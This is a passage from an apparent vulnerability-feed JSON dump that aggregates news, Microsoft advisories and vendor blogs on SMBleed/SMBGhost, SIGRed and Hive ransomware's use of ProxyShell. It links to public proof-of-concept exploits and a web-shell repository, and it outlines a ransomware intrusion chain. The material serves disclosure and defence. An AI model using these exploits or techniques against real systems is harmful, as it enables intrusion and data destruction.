structure contains fields such as the amount of bytes to write and flags, followed by a variable-length buffer,\" the researchers said. \"That's perfect for exploiting the bug since we can craft a message such that we specify the header, but the variable-length buffer contains uninitialized data.\" \n \n\"An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. To exploit the vulnerability against a server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 server,\" Microsoft said in its advisory. \n \n\"To exploit the vulnerability against a client, an unauthenticated attacker would need to configure a malicious SMBv3 server and convince a user to connect to it,\" Microsoft added. \n \n\n\n[](<https://thehackernews.com/images/-5r2cFQ5tcxU/Xt-7b9jI5lI/AAAAAAAAAbc/Lz27jkr0HmYimZJMXmSbvSt2mUc4GI6qQCLcBGAsYHQ/s728-e100/smbleed.jpg>)\n\n \nWorse, SMBleed can be chained with SMBGhost on unpatched Windows 10 systems to achieve remote code execution. The firm has also released a proof-of-concept [exploit code demonstrating](<https://github.com/ZecOps/CVE-2020-1206-POC>) the [flaws](<https://github.com/ZecOps/CVE-2020-0796-RCE-POC>). \n \n\n\n[](<https://thehackernews.com/images/-Jn6fEt5YpZ0/Xt_6MEANjOI/AAAAAAAA24s/zLjx-XBqNLYnjfayGiHXEKJko4si4eOqQCLcBGAsYHQ/s728-e100/windows-security.jpg>)\n\n \nTo mitigate the vulnerability, it's recommended that home and business users install the latest Windows updates as soon as possible. \n \nFor systems where the patch is not applicable, it's advised to block port 445 to prevent lateral movement and remote exploitation. \n \nMicrosoft's security guidance addressing SMBleed and SMBGhost in Windows 10 version 1909 and 1903 and Server Core for the same versions can be [found here](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1206>) and [here](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-06-09T20:30:00", "type": "thn", "title": "SMBleed: A New Critical Vulnerability Affects Windows SMB Protocol", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-1206"], "modified": "2020-06-10T03:44:11", "id": "THN:17F11846886656062FA1EA84D1C74534", "href": "https://thehackernews.com/2020/06/SMBleed-smb-vulnerability.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:27", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgG4LpJKxqUO2-qxnPcHk7kZshWlpcUJf4apWnuuu8g9A2r0wcvybcwpf7lOoNA63j4bRBhFvjSOcGs6VNIFsmjXTIplZEkjAFtBn3cM6NGJ0rIS2GGGAKNgL2WQIm_-fjXlryklUzygBckkBMBoeHlXhheLR9onLzGHVYPSgJnrJE7GbCsqTLo57hD/s728-e100/hive-ransomware.jpg>)\n\nA recent Hive ransomware attack carried out by an affiliate involved the exploitation of \"ProxyShell\" vulnerabilities in the Microsoft Exchange Server that were disclosed last year to encrypt an unnamed customer's network.\n\n\"The actor managed to achieve its malicious goals and encrypt the environment in less than 72 hours from the initial compromise,\" Varonis security researcher, Nadav Ovadia, [said](<https://www.varonis.com/blog/hive-ransomware-analysis>) in a post-mortem analysis of the incident. \n\nHive, which was [first observed](<https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html>) in June 2021, follows the lucrative ransomware-as-a-service (RaaS) scheme adopted by other cybercriminal groups in recent years, enabling affiliates to deploy the file-encrypting malware after gaining a foothold into their victims' networks.\n\n[ProxyShell](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) \u2014 tracked as CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473 \u2014 involves a combination of security feature bypass, privilege escalation, and remote code execution in the Microsoft Exchange Server, effectively granting the attacker the ability to execute arbitrary code on affected servers.\n\nThe issues were addressed by Microsoft as part of its Patch Tuesday updates for April and May 2021.\n\nIn this case, successful exploitation of the flaws allowed the adversary to deploy web shells on the compromised server, using them to run malicious PowerShell code with SYSTEM privileges to create a new backdoor administrator user, hijack the domain admin account, and perform lateral movement.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgbU5YaGjiHhZvFPL5Fqh7rHbVldX6X-unk-Mq6dP0icasfzkogYQnkRDy9ZUNWr3oca2oh6FGdjSzMm5uyXe1DLzwsty4H8hXGZia0azIu3Q24ZyBwemMQXMvu5dpzZQn-9MUl_WWAG5opQBaoXlyg6Esg2eBVWtdYcBrz5l7yZPDtCD1v9nzKF-D8/s728-e100/hive.jpg>)\n\nThe web shells used in the attack are said to have been sourced from a [public git repository](<https://github.com/ThePacketBender/webshells>) and given filenames containing a random mix of characters to evade detection, Ovadia said. Also executed was an additional obfuscated PowerShell script that's part of the Cobalt Strike framework.\n\nFrom there, the threat actor moved to scan the network for valuable files, before proceeding to deploy the Golang ransomware executable (named \"Windows.exe\") to complete the encryption process and display the ransom note to the victim.\n\nOther operations carried out by the malware include deleting shadow copies, turning off security products, and clearing Windows event logs to avoid detection, prevent recovery, and ensure that the encryption happens without any hiccup.\n\nIf anything, the findings are yet another indicator that patching for known vulnerabilities is key to thwarting cyberattacks and other nefarious activities.\n\n\"Ransomware attacks have grown significantly over the past years and remain the preferred method of threat actors aiming to maximize profits,\" Ovadia said. \"It may potentially harm an organization's reputation, disrupt regular operations and lead to temporary, and possibly permanent, loss of sensitive data.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-21T10:00:00", "type": "thn", "title": "New Incident Report Reveals How Hive Ransomware Targets Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-04-21T10:00:58", "id": "THN:84E53E1CA489F43A3D68EC1B18D6C2E2", "href": "https://thehackernews.com/2022/04/new-incident-report-reveals-how-hive.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-12-02T16:49:40", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2021-07-13T07:00:00", "id": "MS:CVE-2021-34473", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-02T16:51:01", "description": "A remote code execution vulnerability exists in Windows Domain Name System servers when they fail to properly handle requests. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the Local System Account. Windows servers that are configured as DNS servers are at risk from this vulnerability.\n\nTo exploit the vulnerability, an unauthenticated attacker could send malicious requests to a Windows DNS server.\n\nThe update addresses the vulnerability by modifying how Windows DNS servers handle requests.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-14T07:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2020-07-28T07:00:00", "id": "MS:CVE-2020-1350", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1350", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-02T16:51:01", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server or client.\n\nTo exploit the vulnerability against a server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 server. To exploit the vulnerability against a client, an unauthenticated attacker would need to configure a malicious SMBv3 server and convince a user to connect to it.\n\nThe security update addresses the vulnerability by correcting how the SMBv3 protocol handles these specially crafted requests.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-12T07:00:00", "type": "mscve", "title": "Windows SMBv3 Client/Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-13T07:00:00", "id": "MS:CVE-2020-0796", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0796", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T16:51:01", "description": "**Important** March 12, 2020 - Microsoft has released CVE-2020-0796 | Windows SMBv3 Client/Server Remote Code Execution Vulnerability to address this vulnerability. For more information about this issue, including download links for an available security update, please review [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>).\n\nMicrosoft is aware of a remote code execution vulnerability in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target SMB Server or SMB Client.\n\nTo exploit the vulnerability against an SMB Server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 Server. To exploit the vulnerability against an SMB Client, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it.\n\nWe will update this advisory when updates are available. If you wish to be notified when this advisory is updated, we recommend that you register for the security notifications mailer to be alerted of content changes to this advisory. See [Microsoft Technical Security Notifications](<https://www.microsoft.com/en-us/msrc/technical-security-notifications?rtc=1>).\n\nPublicly Disclosed | Exploited \n---|--- \nNo | No\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-10T07:00:00", "type": "mscve", "title": "Microsoft Guidance for Disabling SMBv3 Compression", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-12T07:00:00", "id": "MS:ADV200005", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/ADV200005", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "msrc": [{"lastseen": "2023-06-06T14:43:31", "description": "\u672c\u8a18\u4e8b\u306f\u3001\u300cJuly 2020 Security Update: CVE-2020-1350 Vulnerability in Windows Domain Name System (DNS) Server\u300d\u306e\u65e5\u672c\u8a9e\u6284\u8a33\u3067\u3059\u3002 \u672c\u65e5\u3001\u8106\u5f31\u6027\u60c5\u5831 CVE-2020-1350 \u3092\u516c\u958b\u3057", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-14T07:00:00", "type": "msrc", "title": "Windows DNS \u30b5\u30fc\u30d0\u30fc\u306e\u8106\u5f31\u6027\u60c5\u5831 CVE-2020-1350 \u306b\u95a2\u3059\u308b\u6ce8\u610f\u559a\u8d77", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2020-07-14T07:00:00", "id": "MSRC:0BBBB55B6F489CA387A82715A7CF6E11", "href": "/blog/2020/07/20200715-dnsvulnerability/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-21T18:52:49", "description": "Today we released an update for CVE-2020-1350, a Critical Remote Code Execution (RCE) vulnerability in Windows DNS Server that is classified as a \u2018wormable\u2019 vulnerability and has a CVSS base score of 10.0. This issue results from a flaw in Microsoft\u2019s DNS server role implementation and affects all Windows Server versions. Non-Microsoft DNS Servers are not affected. Wormable vulnerabilities have the potential to spread via malware between vulnerable computers without user interaction. Windows DNS Server is a core networking component. While this \u2026\n\n[ July 2020 Security Update: CVE-2020-1350 Vulnerability in Windows Domain Name System (DNS) Server Read More \u00bb](<https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/>)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-07-14T17:01:00", "type": "msrc", "title": "July 2020 Security Update:\u202fCVE-2020-1350 Vulnerability in Windows Domain Name System (DNS) Server", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2020-07-14T17:01:00", "id": "MSRC:79080D1EA83C3BB4689C763E5FACBDB5", "href": "https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T14:43:31", "description": "Today we released an update for CVE-2020-1350, a Critical Remote Code Execution (RCE) vulnerability in Windows DNS Server that is classified as a \u2018wormable\u2019 vulnerability and has a CVSS base score of 10.0. This issue results from a flaw in Microsoft\u2019s DNS server role implementation and affects all Windows Server versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-14T07:00:00", "type": "msrc", "title": "July 2020 Security Update:\u202fCVE-2020-1350 Vulnerability in Windows Domain Name System (DNS) Server", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2020-07-14T07:00:00", "id": "MSRC:0299F0ADFFEC3249877020E014342A78", "href": "/blog/2020/07/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-02T16:15:50", "description": "Today we released an update for CVE-2020-1350, a Critical Remote Code Execution (RCE) vulnerability in Windows DNS Server that is classified as a \u2018wormable\u2019 vulnerability and has a CVSS base score of 10.0. This issue results from a flaw in Microsoft\u2019s DNS server role implementation and affects all Windows Server versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-14T07:00:00", "type": "msrc", "title": "July 2020 Security Update:\u202fCVE-2020-1350 Vulnerability in Windows Domain Name System (DNS) Server", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2020-07-14T07:00:00", "id": "MSRC:79DD362947FCABAB874BE67554F26FA3", "href": "https://msrc.microsoft.com/blog/2020/07/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T15:35:29", "description": "Update August 25, 2021: Microsoft strongly recommends that you update your servers with the most recent security updates available. CVE-2021-34473 (ProxyShell) CVE-2021-34523 (ProxyShell) CVE-2021-33766 Today is Update Tuesday \u2013 our commitment to provide a predictable monthly schedule to release updates and provide the latest protection to our customers. Update Tuesday is a monthly cycle when Microsoft releases patches for vulnerabilities that we have found proactively or that have been disclosed to us through our security partnerships under a coordinated vulnerability disclosure.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "msrc", "title": "April 2021 Update Tuesday packages now available", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-04-13T07:00:00", "id": "MSRC:C28CD823FBB321014DB6D53A28DA0CD1", "href": "/blog/2021/04/april-2021-update-tuesday-packages-now-available/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2020-07-21T16:02:08", "description": "Recently, [Check Point researchers](<https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin:-exploiting-a-17-year-old-bug-in-windows-dns-servers/>) found a 17-year-old high-profile flaw, SIGRed (CVE-2020-1350). The flaw is a wormable, critical vulnerability in the Windows DNS server, and can be triggered by a malicious DNS response.\n\nOn a zero to 10 scale, this vulnerability has received a CVSS base score of 10 in terms of how easy it is to exploit and how damaging it can be. Successful exploitation could lead to a critical RCE on Windows DNS servers due to the improper handling of DNS requests - effectively compromising the entire corporate infrastructure.\n\nFortunately, Imperva [DDoS Protection for Domain Name Servers (DNS)](<https://www.imperva.com/products/dns-ddos-protection-services/>) can shield against this vulnerability and ensure the attack is not forwarded to the origin name server. Customers using our protected DNS service are safe provided that their DNS server accepts incoming requests from Imperva\u2019s proxies only (this configuration should be done in the onboarding process); thus, they should block incoming requests from other IPs and block requests that are not for this domain.\n\n## **How do we protect against this vulnerability? **\n\nThe Imperva service checks the requested DNS name and forwards the request to the origin (authoritative DNS server) only if the name matches the authoritative domain name.\n\nFor example: If our protected DNS customer protects a DNS domain, d1.com, so that only DNS queries that match: *.d1.com will be forwarded to the origin server; any other domain name will not be forwarded. \n\nIn an attempt to exploit this vulnerability, an attacker would send a malicious DNS query with a domain name that is under the attacker\u2019s control (Ex: *.attacker.com). However, this query will not be forwarded to the origin because it doesn\u2019t match *.d1.com.\n\nMore focus on DNS is also on the docket at Imperva, in the form of a complete DNS offering later this year. The offering will include a fully managed secured DNS service, where you\u2019ll be able to administrate and secure your DNS zones, mitigating L3/4 volumetric, protocol &amp; DNS DDoS attacks.\n\nThe goal is to provide a best-in-class secured DNS solution with maximum reliability, security and visibility, complemented by the kind of full management capabilities you\u2019d expect from a world-class DNS solution.\n\nIn the meantime, if you have further questions about CVE-2020-1350, or need additional information on how Imperva can offer you top-notch, edge to end protection, [contact us](<https://www.imperva.com/contact-us/>) today.\n\nThe post [Imperva Shields Against Windows DNS Server RCE Vulnerability (CVE-2020-1350)](<https://www.imperva.com/blog/imperva-shields-against-windows-dns-server-rce-vulnerability-cve-2020-1350/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-07-21T11:24:14", "type": "impervablog", "title": "Imperva Shields Against Windows DNS Server RCE Vulnerability (CVE-2020-1350)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2020-07-21T11:24:14", "id": "IMPERVABLOG:020B268DFC760B88704D35A6F4CF30D7", "href": "https://www.imperva.com/blog/imperva-shields-against-windows-dns-server-rce-vulnerability-cve-2020-1350/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2020-08-07T08:03:43", "description": "On July 14, 2020, Microsoft issued a new security advisory on [Microsoft Windows Patch Day](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350>) \u2013 addressing **CVE-2020-1350, **also known as **SigRed** \u2013 a remote code execution vulnerability in Windows Domain Name System (DNS) servers. The security issue has received a critical severity rating score of 10.0 based on CVSS v3.1 Scoring system. \n\n**SigRed** affects Windows servers that are configured to run the DNS Server role as described in the advisory.\n\n#### **The Vulnerability**\n\nMicrosoft mentioned that \u201cit found no evidence to show that the 